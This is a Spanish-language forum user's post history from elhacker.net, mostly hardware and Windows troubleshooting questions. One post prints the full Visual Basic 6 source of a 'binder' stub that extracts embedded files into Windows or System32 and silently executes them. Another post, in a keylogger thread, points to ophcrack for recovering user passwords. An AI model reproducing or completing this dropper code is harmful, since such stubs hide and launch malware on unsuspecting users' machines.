elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8
1  Informática / Hardware / Re: Mi configuracion PC en: 13 Octubre 2014, 21:22 pm
Yo lo que te recomendaría es una mejor grafica, y como te dicen ,preparate para tener un radiador de pc con ese procesador xD. Yo tengo un phenom 965 y en invierno paso calor con la bestia al 100%

He leido ya bastante sobre los FX8, hay mucha gente que dicen lo mismo que se calientan demasiado. Me pillare el i5,cual grafica me recomiendas?
2  Informática / Hardware / Re: Mi configuracion PC en: 10 Octubre 2014, 20:55 pm
hola Randomize gracias por contestar, por lo que veo el i5 rinde mejor hasta 4 nucleos no? y consume menos energia electrica.

Y para juegos como estos:

Watch Dogs

Requisitos recomendados

    Procesador: Core i7 3770 @ 3.5Ghz or AMD FX-8350 @ 4.0Ghz
    RAM: 8 GB
    Tarjeta gráfica: 2048 VRAM DirectX 11 con Shader Model 5.0 o superior
    Tarjeta de sonido: Tarjeta de sonido Surround Sound 5.1
    25 GB de espacio disponible.

como ves me pide un i7.

Saludos.
3  Informática / Hardware / Mi configuracion PC en: 9 Octubre 2014, 22:24 pm
Hola buenas a todos.

Hecho esta configuracion y os la muestro para los que sois expertos me digan si esta bien. Se acepta consejos para mejorar el pc,pero estoy al limite de mi presupuesto 650 euros.

www.pccomponentes.com/pccly/7473De9c

4  Sistemas Operativos / Windows / disco duro de portatil con windows xp en: 18 Abril 2013, 16:30 pm
Hola buenas a todos.

mi problemilla es,formateo mi portatil con windows XP sp3,se instalada todo bien pero cuando se reinicia para meter los driver se queda cargando el logo de winxp y no pasa de hay,lo reinicio del boton y me sale iniciar windows normalmente,comprueba el disco duro y pone No se puede leer el segmento de archivos 9772,eso es que mi disco duro ya ha palmao(muerto) ;D

Lo pongo en la ps3 lo formateo y me deja guardar partidas,no se si esta roto o no.  :xD

saludos.
5  Sistemas Operativos / Windows / puertos USB malfuncionales en: 7 Febrero 2013, 18:33 pm
despues de instalarme win7 quitando asi el vista, me dejaron de funcionar 2 puertos USB, y ahora me ha dejao de funcionar otro.. que podria hacer para restaurarlos? gracias, 1saludo
6  Sistemas Operativos / Windows / Re: Pasar de windows 7 a XP en: 16 Septiembre 2012, 19:04 pm
haber he formateado primero y he creado particion nueva lo he hecho con el disco del windows 7(ya que es elque me deja instalar) y sigue dandome lo mismo.

lo que pasa que mi disco de xp es SP2,puede que ese sea el problema?
7  Sistemas Operativos / Windows / Pasar de windows 7 a XP en: 16 Septiembre 2012, 16:17 pm
hola tengo un problemilla  ;D

me han traido un pc que antes tenia XP y le intalaron windows 7, quiero intalarle windows XP de nuevo y me pasa lo siguiente:

meto el disco de XP ,carga controladores y me pide los controladores sata.
Le meto el disquete de los controladores sata(es el suyo original)me dice pulsa "S" le doy y me sale el siguiente mensaje.

El programa de instalacion no ha podido encontrar en su equipo los controladores OEM del disquet.

sera que windows 7 no me reconoce la disquetera? es un pc de sobremesa.

por favor si alguien puede ayudarme se lo agradeceria mucho.

SALUDOS.
8  Seguridad Informática / Análisis y Diseño de Malware / Re: Funciones del Keylogger Douglas 2.0 en: 13 Noviembre 2011, 20:21 pm
Si lo que quieres son las claves de usuario, usa el ophcrack es un live cd.  ;-)

saludos.
9  Programación / Programación Visual Basic / creacion de binder en: 13 Noviembre 2011, 19:48 pm
Hola compañeros,estoy haciendo un binder en visual basic 6.
Tengo un problemilla cuando junto los dos archivos y los ejecuto me da error.

Error 76 en tiempo de ejecucion no se ha encontrado la ruta de acceso.

Aqui os pongo el code del stub.



Citar
Private Declare Function ShellExecute Lib "shell32.dll" Alias _
    "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, _
    ByVal lpFile As String, ByVal lpParameters As String, _
    ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Dim con1 As String
Dim con2 As String, curts As Integer
Dim dast As String, dasa() As String, dasa2() As String, sinqi As String
Dim cile As String, nom As String, excile As String, ejcile As String

Private Sub Form_Load()
curts = FreeFile
con1 = "kfhbiubfevgwubog,lnl,myp"
con2 = "eogirnignrnhkrnhleknñenhn"
sinqi = App.Path & "\" & App.EXEName & ".exe"

Open sinqi For Binary As curts
 dast = Space(LOF(curts))
Get curts, , dast
Close curts

dasa() = Split(dast, con1)

For i = 1 To UBound(dasa)

dasa2() = Split(dasa(i), con2)

For x = 0 To UBound(dasa2)

 Select Case x
 
 Case 0 'archivo
 cile = dasa2(x)
 
  Case 1 'nombre del archivo
 nom = dasa2(x)


 Case 2 'ruta extraccion

    Select Case dasa2(x)
    Case "Windows"
    excile = Environ("WINDIR")
   
    Case "System32"
    excile = Environ("WINDIR") & "\system32"
   
    Case "Disco Local"
    excile = Environ("WINDIR")
   
    Case Else
   
    excile = dasa2(x)
    End Select
   
Case 3 ' si se ejecuta o no
ejcile = dasa2(x)

End Select

Next x


Open excile & "\" & nom For Binary As curts
 Put curts, , cile
Close curts

If ejcile = "Si" Then
ShellExecute 0, vbNullString, excile & "\" & nom, vbNullString, vbNullString, 1
Else
End If

Next i
End
End Sub
10  Seguridad Informática / Wireless en Linux / Re: backtrack 5 + realtek 8187 en: 29 Junio 2011, 00:28 am
es que me lo he he descargado en forma de maquina virtual, alo mejor eso?

por que en el portatil tampoco funciona con chipset atheros.
volvere a descargarlo en forma de iso a ver si con el pc real me lo reconoce, es raro por que nunca he tenido problemas con este chipset.


jajjaja andreselmejor,soy un tonto,tonto,tonto y tooonnnnto ajjaj.

Ya esta solucionado,el problema era que en la maquina virtual vmware  no le habia habilitado el usb  :xD (yo es que me quede en virtual pc 2007  :xD )

gracias por tu interes en ayudar.

saludos.
Páginas: [1] 2 3 4 5 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines